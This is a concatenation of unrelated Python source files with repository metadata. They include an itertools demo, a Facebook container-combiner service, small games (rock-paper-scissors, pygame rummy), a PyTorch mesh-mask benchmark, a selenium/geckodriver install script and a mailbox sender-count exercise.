] | permissive | Nobodylesszb/python_module | 122d41e776036dfc61a187e383dda821c35e25c4 | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | refs/heads/master | 2020-05-31T07:48:57.695494 | 2019-07-29T11:32:17 | 2019-07-29T11:32:17 | 190,173,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | #该cycle()函数返回一个迭代器,它重复无限期给出的参数的内容。
# 由于它必须记住输入迭代器的全部内容,
# 如果迭代器很长,它可能会消耗相当多的内存
from itertools import *
for i in zip(range(7), cycle(['a', 'b', 'c'])):
print(i)
"""
output:
(0, 'a')
(1, 'b')
(2, 'c')
(3, 'a')
(4, 'b')
(5, 'c')
(6, 'a')
""" | [
"nobodylesszb@163.com"
] | nobodylesszb@163.com |
62cee17ddeb7c10ac5f70ed1eb57139892d7c7ca | a16236f9fbe72be1a8566d2067e4e66921a8a90e | /fbpmp/data_processing/attribution_id_combiner/attribution_id_spine_combiner_cpp.py | b6614231fe3d00730513a482b8b7b874faec7f16 | [
"MIT"
] | permissive | peking2/fbpcs-1 | dc9e57afc5bab28f0d43ed537d4147e008f51030 | 234bc748f24046a13fbd14ee7794df5d70ab348b | refs/heads/main | 2023-07-29T22:03:05.983480 | 2021-08-18T23:56:25 | 2021-08-18T23:57:19 | 397,813,444 | 0 | 0 | MIT | 2021-08-19T04:15:22 | 2021-08-19T04:15:22 | null | UTF-8 | Python | false | false | 5,169 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import logging
from typing import Optional
from fbpcp.entity.container_instance import ContainerInstanceStatus
from fbpcp.service.onedocker import OneDockerService
from fbpmp.onedocker_binary_names import OneDockerBinaryNames
from fbpmp.pid.service.pid_service.pid_stage import PIDStage
# 10800 s = 3 hrs
DEFAULT_CONTAINER_TIMEOUT_IN_SEC = 10800
class CppAttributionIdSpineCombinerService:
    """Runs the C++ attribution id-spine combiner binary on OneDocker,
    starting one container per data shard and waiting for completion."""

    def _get_combine_cmd_args_for_container(
        self,
        spine_path: str,
        data_path: str,
        output_path: str,
        run_name: str,
        tmp_directory: str,
        padding_size: int,
        sort_strategy: str,
    ) -> str:
        """Build the CLI argument string for one combiner container."""
        # TODO: Probably put exe in an env variable?
        # Try to align with existing paths
        cmd_args = " ".join(
            [
                f"--spine_path={spine_path}",
                f"--data_path={data_path}",
                f"--output_path={output_path}",
                f"--run_name={run_name}",
                f"--tmp_directory={tmp_directory}",
                f"--padding_size={padding_size}",
                f"--sort_strategy={sort_strategy}",
            ]
        )
        return cmd_args

    def combine_on_container(
        self,
        spine_path: str,
        data_path: str,
        output_path: str,
        num_shards: int,
        run_name: str,
        onedocker_svc: OneDockerService,
        tmp_directory: str,
        padding_size: int,
        binary_version: str,
        sort_strategy: str = "sort",
        container_timeout: Optional[int] = None,
    ) -> None:
        """Synchronous wrapper around :meth:`combine_on_container_async`."""
        asyncio.run(
            self.combine_on_container_async(
                spine_path,
                data_path,
                output_path,
                num_shards,
                run_name,
                onedocker_svc,
                tmp_directory,
                padding_size,
                binary_version,
                sort_strategy,
                container_timeout,
            )
        )

    async def combine_on_container_async(
        self,
        spine_path: str,
        data_path: str,
        output_path: str,
        num_shards: int,
        run_name: str,
        onedocker_svc: OneDockerService,
        tmp_directory: str,
        padding_size: int,
        binary_version: str,
        sort_strategy: str = "sort",
        container_timeout: Optional[int] = None,
    ) -> None:
        """Start one combiner container per shard and poll them to completion.

        Raises:
            RuntimeError: if any container ends in a non-COMPLETED state.
        """
        logger = logging.getLogger(__name__)
        timeout = container_timeout or DEFAULT_CONTAINER_TIMEOUT_IN_SEC
        # TODO: Combiner could be made async so we don't have to spawn our
        # own ThreadPoolExecutor here and instead use async primitives
        cmd_args_list = []
        for shard in range(num_shards):
            # TODO: There's a weird dependency between these two services
            # AttributionIdSpineCombiner should operate independently of PIDStage
            next_spine_path = PIDStage.get_sharded_filepath(spine_path, shard)
            next_data_path = PIDStage.get_sharded_filepath(data_path, shard)
            next_output_path = PIDStage.get_sharded_filepath(output_path, shard)
            cmd_args = self._get_combine_cmd_args_for_container(
                next_spine_path,
                next_data_path,
                next_output_path,
                run_name,
                tmp_directory,
                padding_size,
                sort_strategy,
            )
            cmd_args_list.append(cmd_args)
        containers = await onedocker_svc.start_containers_async(
            package_name=OneDockerBinaryNames.ATTRIBUTION_ID_SPINE_COMBINER.value,
            version=binary_version,
            cmd_args_list=cmd_args_list,
            timeout=timeout,
        )
        # Busy wait until all containers are finished
        any_failed = False
        for shard, container in enumerate(containers):
            # Busy wait until the container is finished
            status = ContainerInstanceStatus.UNKNOWN
            logger.info(f"Task[{shard}] started, waiting for completion")
            while status not in [
                ContainerInstanceStatus.FAILED,
                ContainerInstanceStatus.COMPLETED,
            ]:
                container = onedocker_svc.get_containers([container.instance_id])[0]
                status = container.status
                # Sleep 5 seconds between calls to avoid an unintentional DDoS
                logger.debug(f"Latest status: {status}")
                await asyncio.sleep(5)
            logger.info(
                f"container_id({container.instance_id}) finished with status: {status}"
            )
            if status is not ContainerInstanceStatus.COMPLETED:
                logger.error(f"Container {container.instance_id} failed!")
                any_failed = True
        if any_failed:
            raise RuntimeError(
                "One or more containers failed. See the logs above to find the exact container_id"
            )
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
c4b3fd6c50a9c062239571170f6518b778e577d4 | fb67e1b98f4170077da0e29617e34317d7d68d53 | /main.py | 4fa1d56aae636f2b2f3181cb77d4674c0efca12c | [] | no_license | HadiGhazali/rock-paper-scissors | 14151f518d0349bb07b4d22d88a2d423165c9553 | 5505a91f27fb448536364aab277f91a4193cf5a2 | refs/heads/main | 2023-02-01T10:04:22.179265 | 2020-12-20T16:12:59 | 2020-12-20T16:12:59 | 318,649,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,080 | py | from random import choice
from constants import PLAYER_OPTIONS, PLAY_BUTTON, STATUS
from core import check_win, modify_scores, check_total
scores = {'user': 0, 'system': 0, 'total_user': 0, 'total_system': 0}
play = True
while play:
user_input = input('Enter your choice pleas')
system_input = choice(list(PLAYER_OPTIONS.keys()))
if user_input in PLAYER_OPTIONS.keys():
result = check_win(user_input, system_input)
current_scores = modify_scores(result, scores)
print('your choice:{}, system choice:{},result:{},\t {}-{}'.format(PLAYER_OPTIONS[user_input],
PLAYER_OPTIONS[system_input], STATUS[result],
current_scores['user'],
current_scores['system']))
check_total(current_scores)
elif user_input in PLAY_BUTTON.keys():
play = False
print('Bye!')
else:
print('Invalid input')
| [
"hadivardanjani1378@gmail.com"
] | hadivardanjani1378@gmail.com |
bc91b19087d5a7bd6e0122a487b1d95cecab4f5e | 354fe66c120c5902ffc7ddf954ec19cfd0432a99 | /Test Data/base_scripts/example.py | d9d34783c900e9e2d15f969309b8d3a920bde449 | [] | no_license | bartoszirzyk/MachineLearningExperiments | e58f389d7db21cd1be64192c8171a278e1c9cfc0 | 3026e4a0597eb1c835b253e12c35b0096f3a3ee8 | refs/heads/master | 2021-01-21T17:57:10.940984 | 2016-03-12T21:49:32 | 2016-03-12T21:49:32 | 47,024,354 | 0 | 0 | null | 2015-11-28T13:24:00 | 2015-11-28T13:24:00 | null | UTF-8 | Python | false | false | 387 | py | from data import samples
print("There are {} samples.".format(len(samples)))
print("Whois data of 2nd sample (ip: {}):".format(samples[1]["ip"]))
print(samples[1]["whois"])
print("RevDNS data of first ten samples:")
print("\n".join([ repr(s["hostnames"]) for s in samples[:10] ]))
print("Open ports of first 10 samples:")
print("\n".join([ repr(s["ports"]) for s in samples[:10] ]))
| [
"kacper.b.zuk@gmail.com"
] | kacper.b.zuk@gmail.com |
55b924629ae7cc5e7818fa72e34b3189bb0c1917 | 2955e99046b6888ba3203697f1de354ed78f2912 | /src/game_rummy.py | 36862124164a68ee424af146c9fbe4b2f6077caa | [] | no_license | kishansinha181/Rummy-pygame | 9e2f179946f9b5853136102dc1b0e442cf2d7758 | 6db5e71a2512c6a470a2df099a2709ec2d607626 | refs/heads/master | 2022-12-08T06:30:19.304211 | 2020-08-31T04:40:43 | 2020-08-31T04:40:43 | 291,606,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,085 | py | import pygame
import os
import random
import sys
import time
from pygame.locals import *
import itertools
pygame.init()
screen = pygame.display.set_mode((1500,750))
play =True
pygame.display.set_caption("RUMMY")
xc=50
y_u=100
y_d=500
x_change=0
y_change=0
z=0
y=0
suits = ["c" , "d" , "h" , "s"]
cards_num = []
for i in range(1,14):
if i<10:
cards_num.append("0"+str(i))
else:
cards_num.append(str(i))
deck=[]
for j in cards_num:
for k in suits:
t=j+k
deck.append(t)
deck.append(t)
random.shuffle(deck)
sample_p=[]
sample_c=[]
deck_dis=[]
for i in range(13):
sample_p.append(deck[i])
deck.pop(i)
for i in range(13):
sample_c.append(deck[i])
deck.pop(i)
m=deck.pop()
deck_dis.append(m)
c3_1_p=[]
c3_2_p=[]
c3_3_p=[]
c4_p=[]
c3_1_c=[]
c3_2_c=[]
c3_3_c=[]
c4_c=[]
v_3=[]
v_4=[]
c3_sets_c=[]
c3_sets_d=[]
c3_sets_h=[]
c3_sets_s=[]
c3_sets_id1=[]
c3_sets_id2=[]
c3_sets_id3=[]
c3_sets_id4=[]
for i in range(1,12):
c3_sets_c.append([str(i),str(i+1),str(i+2)])
c3_sets_c.append([str(1),str(12),str(13)])
for j in c3_sets_c:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_c:
for j in range(3):
i[j]=i[j]+suits[0]
for i in range(1,12):
c3_sets_d.append([str(i),str(i+1),str(i+2)])
c3_sets_d.append([str(1),str(12),str(13)])
for j in c3_sets_d:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_d:
for j in range(3):
i[j]=i[j]+suits[1]
for i in range(1,12):
c3_sets_h.append([str(i),str(i+1),str(i+2)])
c3_sets_h.append([str(1),str(12),str(13)])
for j in c3_sets_h:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_h:
for j in range(3):
i[j]=i[j]+suits[2]
for i in range(1,12):
c3_sets_s.append([str(i),str(i+1),str(i+2)])
c3_sets_s.append([str(1),str(12),str(13)])
for j in c3_sets_s:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_s:
for j in range(3):
i[j]=i[j]+suits[3]
for i in range(1,14):
c3_sets_id1.append([str(i),str(i),str(i)])
for j in c3_sets_id1:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id1:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
i[2] = i[2]+ suits[2]
for i in range(1,14):
c3_sets_id2.append([str(i),str(i),str(i)])
for j in c3_sets_id2:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id2:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
i[2] = i[2]+ suits[3]
for i in range(1,14):
c3_sets_id3.append([str(i),str(i),str(i)])
for j in c3_sets_id3:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id3:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[2]
i[2] = i[2]+ suits[3]
for i in range(1,14):
c3_sets_id4.append([str(i),str(i),str(i)])
for j in c3_sets_id4:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id4:
i[0] = i[0]+ suits[1]
i[1] = i[1]+ suits[2]
i[2] = i[2]+ suits[3]
f_3_sets=c3_sets_c +c3_sets_d+c3_sets_h+c3_sets_s+c3_sets_id1+c3_sets_id2+c3_sets_id3+c3_sets_id4
c4_sets_c=[]
c4_sets_d=[]
c4_sets_h=[]
c4_sets_s=[]
c4_sets_id=[]
for i in range(1,11):
c4_sets_c.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_c.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_c:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_c:
for j in range(4):
i[j]=i[j]+suits[0]
for i in range(1,11):
c4_sets_d.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_d.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_d:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_d:
for j in range(4):
i[j]=i[j]+suits[1]
for i in range(1,11):
c4_sets_h.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_h.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_h:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_h:
for j in range(4):
i[j]=i[j]+suits[2]
for i in range(1,11):
c4_sets_s.append([str(i),str(i+1),str(i+2),str(i+3)])
c4_sets_s.append([str(1),str(11),str(12),str(13)])
for j in c4_sets_s:
for i in range(4):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_s:
for j in range(4):
i[j]=i[j]+suits[3]
for i in range(1,14):
c4_sets_id.append([str(i),str(i),str(i),str(i)])
for j in c4_sets_id:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c4_sets_id:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
i[2] = i[2]+ suits[2]
i[3] = i[3]+ suits[3]
f_4_sets = c4_sets_c+c4_sets_d+c4_sets_h+c4_sets_s+c4_sets_id
def disp():
    """Draw the static UI for the current frame: player labels, scores,
    card-set slot captions, the draw-pile and declare button, turn
    prompts, and the win/lose overlay.

    Reads module-level game state: sy, sc (scores), z (pick/throw phase),
    y (turn counter), game_lost, game_won.
    """
    # Player labels.
    myfont = pygame.font.Font("FreeSansBold.ttf",34)
    mytext = myfont.render("CPU", True, (0,0,0))
    screen.blit(mytext, (200,60))
    myfont = pygame.font.Font("FreeSansBold.ttf",34)
    mytext = myfont.render("YOU", True, (0,0,0))
    screen.blit(mytext, (200,620))
    # Human player's point total (bottom-left).
    myfont = pygame.font.Font("FreeSansBold.ttf",28)
    mytext = myfont.render("Points:", True, (191,13,182))
    screen.blit(mytext, (100,670))
    myfont = pygame.font.Font("FreeSansBold.ttf",28)
    mytext = myfont.render(str(sy), True, (23,15,186))
    screen.blit(mytext, (250,670))
    # CPU's point total (top-left).
    myfont = pygame.font.Font("FreeSansBold.ttf",28)
    mytext = myfont.render("Points:", True, (191,13,182))
    screen.blit(mytext, (100,20))
    myfont = pygame.font.Font("FreeSansBold.ttf",28)
    mytext = myfont.render(str(sc), True, (23,15,186))
    screen.blit(mytext, (250,20))
    # Captions for the player's four meld slots (bottom row).
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("1st 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (550,630))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("2nd 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (800,630))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("3rd 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (1050,630))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("4 Cards Set", True, (0,0,0))
    screen.blit(mytext, (1325,630))
    # Captions for the CPU's four meld slots (top row).
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("1st 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (550,75))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("2nd 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (800,75))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("3rd 3 Cards Set", True, (0,0,0))
    screen.blit(mytext, (1050,75))
    myfont = pygame.font.Font("FreeSansBold.ttf",14)
    mytext = myfont.render("4 Cards Set", True, (0,0,0))
    screen.blit(mytext, (1325,75))
    # Face-down draw pile and the declare button.
    screen.blit(pygame.image.load('Image/back111.gif'),(400,300))
    #screen.blit(pygame.image.load('Image/done.png'),(50,300))
    screen.blit(pygame.image.load('Image/declare.png'),(900,325))
    # Phase prompt: z == 0 means pick a card, z == 1 means throw one.
    if z==0 :
        myfont = pygame.font.Font("FreeSansBold.ttf",38)
        mytext = myfont.render("Pick a Card", True, (255,0,0))
        screen.blit(mytext, (800,670))
    if z==1 :
        myfont = pygame.font.Font("FreeSansBold.ttf",38)
        mytext = myfont.render("Throw a Card", True, (255,0,0))
        screen.blit(mytext, (800,670))
    # After the player's full turn (even non-zero y), show it's CPU's turn.
    if y%2==0 and y!=0:
        myfont = pygame.font.Font("FreeSansBold.ttf",38)
        mytext = myfont.render("CPU's Turn", True, (255,0,0))
        screen.blit(mytext, (800,20))
    # Full-screen end-of-game overlays.
    if game_lost:
        screen.blit(pygame.image.load('Image/you_lose.jpeg'),(0,0))
    if game_won:
        screen.blit(pygame.image.load('Image/you_won.jpg'),(0,0))
# Round-outcome flags, initialized before the main loop starts.
game_won = False
game_lost =False
while play:
screen.fill((30,150,35))
mx,my = pygame.mouse.get_pos()
score_you=[]
score_cpu=[]
for i in range(len(deck)):
screen.blit(pygame.image.load('Image/'+deck[i]+'.gif'),(400,300))
for i in range(len(sample_p)):
screen.blit(pygame.image.load('Image/'+sample_p[i]+'.gif'),(xc + 25* i,y_d))
for i in sample_p:
k=int(i[0:2])
if 2<=k<=9:
score_you.append(k)
if 10<= k <=13 or k==1:
score_you.append(10)
sy=sum(score_you)
for i in range(len(sample_c)):
screen.blit(pygame.image.load('Image/'+sample_c[i]+'.gif'),(xc + 25* i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(xc + 25* i,y_u))
for i in sample_c:
k=int(i[0:2])
if 2<=k<=9:
score_cpu.append(k)
if 10<= k <=13 or k==1:
score_cpu.append(10)
sc=sum(score_cpu)
if len(deck_dis) >0:
screen.blit(pygame.image.load('Image/'+deck_dis[len(deck_dis)-1]+'.gif'),(650,300))
else:
screen.blit(pygame.image.load('Image/bottom01.gif'),(650,300))
if len(c3_1_p)==4:
r_1=c3_1_p.pop(0)
sample_p.append(r_1)
for i in range(len(c3_1_p)):
screen.blit(pygame.image.load('Image/'+c3_1_p[i]+'.gif'),(500 + 50*i,500))
if len(c3_2_p)==4:
r_2=c3_2_p.pop(0)
sample_p.append(r_2)
for i in range(len(c3_2_p)):
screen.blit(pygame.image.load('Image/'+c3_2_p[i]+'.gif'),(750 + 50*i,500))
if len(c3_3_p)==4:
r_3=c3_3_p.pop(0)
sample_p.append(r_3)
for i in range(len(c3_3_p)):
screen.blit(pygame.image.load('Image/'+c3_3_p[i]+'.gif'),(1000 + 50*i,500))
if len(c4_p)==5:
r_4=c4_p.pop(0)
sample_p.append(r_4)
for i in range(len(c4_p)):
screen.blit(pygame.image.load('Image/'+c4_p[i]+'.gif'),(1250 + 50*i,500))
if y%2==0 and y!=0:
y=0
sample_c.append(deck[len(deck)-1])
deck.pop()
a=sample_c.pop(0)
deck_dis.append(a)
t_3 = list(itertools.combinations(set(sample_c),3))
u_3 = list(map(list,t_3))
for i in u_3:
v_3.append(sorted(i))
t_4 = list(itertools.combinations(set(sample_c),4))
u_4 = list(map(list,t_4))
for i in u_4:
v_4.append(sorted(i))
s_3=[]
l_3c=[]
s_4=[]
l_4c=[]
for i in v_3:
for j in f_3_sets:
if i==j:
s_3.append(i)
for i in v_4:
for j in f_4_sets:
if i==j:
s_4.append(i)
for i in s_3:
for j in range(3):
l_3c.append(i[j])
for i in s_4:
for j in range(4):
l_4c.append(i[j])
if len(s_4)>=1:
c4_c = s_4[0]
for i in range(len(c4_c)):
screen.blit(pygame.image.load('Image/'+c4_c[i]+'.gif'),(1250 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(1250 + 50*i,y_u))
for j in range(4):
if s_4[0][j] in sample_c:
sample_c.remove(s_4[0][j])
if len(s_3)>=1:
c3_1_c = s_3[0]
for i in range(len(c3_1_c)):
screen.blit(pygame.image.load('Image/'+c3_1_c[i]+'.gif'),(500 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(500 + 50*i,y_u))
for j in range(3):
if s_3[0][j] in sample_c:
sample_c.remove(s_3[0][j])
if len(s_3)>=2 and len(set(l_3c[0:6]))==6:
c3_2_c = s_3[1]
for i in range(len(c3_2_c)):
screen.blit(pygame.image.load('Image/'+c3_2_c[i]+'.gif'),(750 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(750 + 50*i,y_u))
for j in range(3):
if s_3[1][j] in sample_c:
sample_c.remove(s_3[1][j])
if len(s_3)>=3 and len(set(l_3c[0:9]))==9:
c3_3_c = s_3[2]
for i in range(len(c3_3_c)):
screen.blit(pygame.image.load('Image/'+c3_3_c[i]+'.gif'),(1000 + 50*i,y_u))
screen.blit(pygame.image.load('Image/back111.gif'),(1000 + 50*i,y_u))
for j in range(3):
if s_3[2][j] in sample_c:
sample_c.remove(s_3[2][j])
for event in pygame.event.get():
if event.type==MOUSEBUTTONDOWN and event.button==1:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650 and z==1 :
y+=1
z-=1
n=sample_p.pop(i)
deck_dis.append(n)
if 650<mx<730 and 300<my<425 and z==0:
y+=1
z+=1
p = deck_dis.pop()
sample_p.append(p)
if 400<mx<480 and 300<my<425 and z==0:
y+=1
z+=1
q=deck.pop()
sample_p.append(q)
if 900<mx<1100 and 325<my<385 and z!=1:
if len(c3_1_p)<3 or len(c3_2_p)<3 or len(c3_3_p)<3 or len(c4_p)<4 or sorted(c3_1_p) or sorted(c3_2_p) or sorted(c3_3_p) not in f_3_sets or sorted(c4_p) not in f_4_sets :
game_lost=True
if 900<mx<1100 and 325<my<385 and sy==0 and z!=1:
if sorted(c3_1_p) and sorted(c3_2_p) and sorted(c3_3_p) in f_3_sets and sorted(c4_p) in f_4_sets:
game_won=True
if event.type==KEYDOWN and event.key ==K_KP1:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_1_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP2:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_2_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP3:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c3_3_p.append(r)
if event.type==KEYDOWN and event.key ==K_KP4:
for i in range(len(sample_p)):
if (xc + 25* i) < mx < (xc + 25* (i+1)) and 500<my<650:
r=sample_p.pop(i)
c4_p.append(r)
if event.type==KEYDOWN and event.key ==ord('r'):
for i in range(len(c3_1_p)):
if (500 + 50* i) < mx < (500 + 50* (i+1)) and 500<my<650:
r=c3_1_p.pop(i)
sample_p.append(r)
for i in range(len(c3_2_p)):
if (750 + 50* i) < mx < (750 + 50* (i+1)) and 500<my<650:
r=c3_2_p.pop(i)
sample_p.append(r)
for i in range(len(c3_3_p)):
if (1000 + 50* i) < mx < (1000 + 50* (i+1)) and 500<my<650:
r=c3_3_p.pop(i)
sample_p.append(r)
for i in range(len(c4_p)):
if (1250 + 50* i) < mx < (1250 + 50* (i+1)) and 500<my<650:
r=c4_p.pop(i)
sample_p.append(r)
if event.type==KEYDOWN and event.key ==ord('q'):
play = False
if event.type == pygame.QUIT:
play = False
disp()
pygame.display.update() | [
"kishan.sinha18@gmail.com"
] | kishan.sinha18@gmail.com |
aac67577a86224b9db3f14bdf0e54a3151cef1d4 | e7f4d93bf35f496c39cc16b7e33020ff1990881e | /run.py | 84595f396c520561fdbc0b087c3763eba21fa3c8 | [
"MIT"
] | permissive | ajdillhoff/pytorch-mesh-mask | a769bb4865c716ed4c29b4bc82ba28e21325d6f3 | 7f86b2229bce6723666bf4a1494cec79070add32 | refs/heads/master | 2021-06-20T00:26:38.773761 | 2021-02-06T21:09:19 | 2021-02-06T21:09:19 | 181,722,401 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | import time
import torch
import src.MeshMask as mm
from src.util import load_mesh_data
def main():
mesh_path = "Sphere.mesh.xml"
image_height = 100
image_width = 100
mesh_vertices, normals, bone_weights, triangles = load_mesh_data(mesh_path)
mesh = torch.tensor(mesh_vertices, dtype=torch.float32).repeat(32, 1, 1)
print("Input size: {}".format(mesh.shape))
# Mesh Mask
mesh_mask = mm.MeshMask([image_height, image_width],
triangles)
print("**CPU**")
masks = torch.ByteTensor(mesh.shape[0], mesh.shape[1])
s = time.time()
for i in range(mesh.shape[0]):
masks[i] = mesh_mask(mesh[i])
print("Compute time: {}s".format(time.time() - s))
s = time.time()
for i in range(mesh.shape[0]):
temp = mesh[i, masks[i]]
print("Access time: {}s".format(time.time() - s))
mesh_mask.triangles = triangles.cuda()
mesh = mesh.cuda()
print("**CUDA**")
s = time.time()
mask = mesh_mask(mesh)
print("Compute time: {}s".format(time.time() - s))
s = time.time()
for i in range(mesh.shape[0]):
temp = mesh[i, mask[i]]
print("Access time: {}s".format(time.time() - s))
if __name__ == "__main__":
main()
| [
"ajdillhoff@gmail.com"
] | ajdillhoff@gmail.com |
ee143f1efcc713e6d0ebae48abd8d2f0e560c0ad | cf0c4657fd8198b904932a3c924f3c1f22bddd87 | /setup.py | cf7c2a620b5ed21b92440e9125e1ae9bfc4fad00 | [] | no_license | Coconut-System-Engineer/Create-automatic-akun-instagram | 5e46fd2df6c5a3dcd22058a9e009c972340208bd | 00ec28ffed76428a9db7e05f5ad3e3023897ad87 | refs/heads/master | 2021-03-01T03:16:46.573225 | 2020-03-09T06:21:09 | 2020-03-09T06:21:09 | 245,750,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,003 | py | import os
import random
import sys
import time
from time import sleep
os.system('clear')
def mengetik (s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(random.random() * 0.4)
os.system('clear')
sleep(0.1)
print ('Loading...')
sleep(0.1)
mengetik(' > > > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(1)
def main():
print "\033[1;00m==============================================================================================================="
sleep(0.1)
print "\033[1;91m*********************___________***Auto Create Akun Instagram***___________************************************"
sleep(0.1)
print "* 0000000000000 000000000000 000000000000 000000 000000 00000000000000000000 *"
sleep(0.1)
print "* 000 0000 000000000000 0000000000000 00000000000 000000000 00000000000000000000 *"
sleep(0.1)
print "* 000 00 0000 0000 0000 000000 000000 000000 000000 000000 00 00000 00 *"
sleep(0.1)
print "* 000 00000 0000 0000 000000 00000 00000 00000 00000 00000 *"
sleep(0.1)
print "* 000 000000000000 0000 00000 0000 0000 0000 0000 00000 *"
sleep(0.1)
print "* 000 00000 000000000000 00000000000 0000 0000 0000 0000 00000 *"
sleep(0.1)
print "* 000 00 0000 0000 00000000000 00000 00000 00000 00000 00000 *"
sleep(0.1)
print "* 000 0000 0000 0000 0000 000000 000000 000000 000000 000000 00000 *"
sleep(0.1)
print "* 000 0000 000000000000 0000 000000 00000000000 0000000000 00000 *"
sleep(0.1)
print "* 000000000000 000000000000 0000 000000 000000 000000 00000000000000 *"
sleep(0.1)
print "\033[00m \033[1;94m*********************___________****** C O C O N U T ******___________****************************************"
sleep(0.1)
print "\033[00m==============================================================================================================="
print '\n \033[1;92m > > > silakan tunggu proses penginstalan pakage < < < \n'
sleep(0.1)
os.system("apt-get update && apt-get install python-pip && pip install selenium")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
os.system("chmod 777 geckodriver-v0.26.0-linux64/geckodriver")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
os.system("cp geckodriver-v0.26.0-linux64/geckodriver /usr/local/bin/")
sleep(0.1)
mengetik('> > > > > > > > > > > > > > > > > > > > > > > > >] 100%')
sleep(0.1)
print '\n \033[1;00m\033[1;94m*************** __________Selelsai__________ ***************'
main()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
2f5c1ccb3a93ecdc0881568dd20c5919318f89e3 | 4e2ad17d96e7ba608735416bb917d8511656c0f4 | /9.4[nice qn].py | bb6d7323b12db81d539dc5528d618c709bd53e11 | [] | no_license | gadia-aayush/Python_for_Informatics-Solutions | 140af49da7c5277b2065a53407af58a7e6459106 | 356155a0ce82194522f2bcd2472ababea7b0d2d8 | refs/heads/master | 2021-09-26T13:38:54.593015 | 2018-10-30T18:14:26 | 2018-10-30T18:14:26 | 111,910,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 726 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 21:40:40 2017
@author: aayushgadia
"""
i=0
sender_list=[]
filename=input('Enter a file name: ')
f_in=open(filename)
for line in f_in:
if line.startswith('From '):
word_list=line.split()
sender=word_list[1]
sender_list.append(sender)
print(sender_list,'\n')
d=dict()
for sent in sender_list:
if sent not in d:
d[sent]=1
else:
d[sent]+=1
print(d)
new_d={}
for k,v in d.items():
new_d[v]=k
if v>i:
i=v
continue
else:
continue
print(new_d)
print('\nMaximum messages is by',new_d[i],'with',i,'messages')
| [
"noreply@github.com"
] | noreply@github.com |
